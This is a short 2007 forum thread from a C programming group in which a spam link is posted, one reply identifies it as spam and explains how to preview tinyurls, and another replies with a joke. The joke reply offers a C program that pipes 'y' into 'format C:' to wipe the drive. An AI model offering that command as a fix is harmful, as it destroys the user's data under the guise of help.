Need some Help

Discussion in 'C Programming' started by a.schoeni@gmx.de, Aug 23, 2007.

  1. Guest

    , Aug 23, 2007

  2. writes:
    > On my Windows Desktop occures this Problem: www.tinyurl.com/[DELETED]

    This is spam; please do not follow the link.

    The tinyurl redirects to a German gaming site; the target URL ends
    with "/uid=####" (a 4-digit number). The same URL has been posted
    here several times under subjects such as "Who might help me" and
    "Linux is about to buy Microsoft".

    (You can trace tinyurls without connecting to the target site by going
    to tinyurl.com in your browser and enabling previews.)

    Keith Thompson, Aug 23, 2007

  3. Army1987 Guest

    On Thu, 23 Aug 2007 13:44:25 -0700, a.schoeni wrote:

    > On my Windows Desktop occures this Problem: [url snipped]

    This C program will solve it:
    #include <stdlib.h>
    int main(void) { return system("echo y | format C: > NUL"); }

    --
    Army1987 (Replace "NOSPAM" with "email")
    No-one ever won a game by resigning. -- S. Tartakower
    Army1987, Aug 24, 2007